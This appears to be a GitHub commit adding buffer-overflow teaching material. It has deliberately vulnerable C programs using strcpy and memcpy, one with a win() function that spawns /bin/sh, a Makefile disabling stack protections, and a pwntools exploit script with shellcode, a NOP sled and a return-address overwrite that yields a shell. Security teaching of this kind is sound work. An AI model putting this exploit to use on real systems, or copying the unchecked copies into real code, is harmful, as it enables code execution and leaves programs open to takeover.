Permalink
Show file tree
Hide file tree
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing
6 changed files
with
161 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
#include <stdio.h> | ||
#include <string.h> | ||
#include <unistd.h> | ||
|
||
int BUFFER=200; | ||
|
||
int copy(char* input){ | ||
char buffer[BUFFER]; | ||
strcpy(buffer, input); | ||
|
||
} | ||
|
||
int main(int argc, char* argv[]){ | ||
/* Main Function*/ | ||
char buf[400]; | ||
printf("Smash The Stack\n"); | ||
//Get the data | ||
int r; | ||
r = read(0, buf, 400); //Save Version | ||
|
||
int out = copy(buf); | ||
printf("Lose :(\n"); | ||
return 0; | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,61 @@ | ||
from pwn import * | ||
|
||
#Update the Context with the Architecture and OS | ||
context.update(arch="i386", os="linux") | ||
|
||
#Create a Process Object to talk to. This should be our Target Binary | ||
p = process("./classic") | ||
|
||
# Do an initial read to get the welcome message | ||
data = p.read() | ||
print(data) #For Debugging | ||
|
||
raw_input("Attach GDB and press enter") #More debugging | ||
|
||
|
||
# And add our Shellcode | ||
|
||
#shellcode ="".join(["\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46", | ||
# "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68", | ||
# "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"]) | ||
|
||
#shellcode = "".join(["\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70", | ||
# "\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61", | ||
# "\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52", | ||
# "\x51\x53\x89\xe1\xcd\x80"]) | ||
shellcode = asm(shellcraft.sh()) | ||
print(shellcraft.sh()) | ||
|
||
|
||
# Offset to EIP (You need to calculate this) | ||
OFFSET = 236 | ||
|
||
#Address we want to jump to (You need to supply this) | ||
#Pwntools will automatically convert to the correct endianness | ||
#TARGET_ADDRESS = p32(0xffffd080) | ||
TARGET_ADDRESS = p32(0x0804901d) | ||
#TARGET_ADDRESS = "BBBB" | ||
|
||
|
||
#Now we will build our payload | ||
|
||
PADD = 150 | ||
payloadLen = OFFSET - len(shellcode) #How many 'A's to Pad with | ||
payloadLen = payloadLen - PADD #I like a bit of space below the shellcode too | ||
|
||
payload = "\x90"*payloadLen | ||
payload += shellcode #Add Shellcode | ||
payload += "\x90"*PADD#30 #More Nops | ||
payload += TARGET_ADDRESS #Address to Jump to | ||
|
||
print("PAYLOAD {0} \n{1}".format(payload, len(payload))) | ||
p.writeline(payload) #Write it to the Binary | ||
p.interactive() #Go into interactive mode. | ||
|
||
#34 is OK, > 34 Crashses | ||
|
||
|
||
|
||
#Compile With | ||
#gcc -m32 -fno-stack-protector -z execstack -no-pie classic.c -o classic | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
# Build the first overflow target | ||
|
||
CC = gcc | ||
CFLAGS = -m32 -g -z execstack | ||
|
||
|
||
firstOverflow: firstOverflow.c | ||
|
||
$(CC) $(CFLAGS) firstOverflow.c -o firstOverflow | ||
|
||
|
||
all: firstOverflow | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
#include <stdio.h> | ||
#include <stdlib.h> | ||
#include <string.h> | ||
#include <unistd.h> | ||
|
||
int BUFFER=150; | ||
|
||
void win(void){ | ||
/*Win Condition | ||
We Want to jump here | ||
*/ | ||
printf("\n ===== Win ===== \n\n"); | ||
system("/bin/sh"); //Tradition to get a shell | ||
} | ||
|
||
void lose(void){ | ||
/* Lose Condition */ | ||
printf("Current Memory Address is %p\n",lose); | ||
printf("Aim for %p\n", win); | ||
printf("Lose :(\n"); | ||
} | ||
|
||
int main(int argc, char* argv[]){ | ||
/* Main Function*/ | ||
|
||
//Pointer to the lose function | ||
void (*fp)(void) = lose; | ||
|
||
char buffer[BUFFER]; | ||
printf("Overflow the Buffer\n"); | ||
|
||
if (argc != 2){ | ||
printf("Overflow the buffer\n"); | ||
printf("Hint! Try `python -c \"print 'A'*100\"`\n"); | ||
return -1; | ||
} | ||
|
||
memcpy(buffer, argv[1], strlen(argv[1])); | ||
printf("Off to %p\n",fp); | ||
fp(); | ||
|
||
return 0; | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
int add(int var1, int var2){ | ||
//Add two numbers | ||
int total; | ||
total = var1+var2; | ||
return total; | ||
} | ||
|
||
void main(int argv, char* argc){ | ||
//Function call | ||
int total = add(10, 20); | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
#include <stdio.h> | ||
#include <string.h> | ||
|
||
void main(void){ | ||
char theString[15]; | ||
//Copy a String that is longer than the space allocated | ||
strcpy(theString, "Hello World, This Is A Long String"); | ||
printf("%s", theString); | ||
} |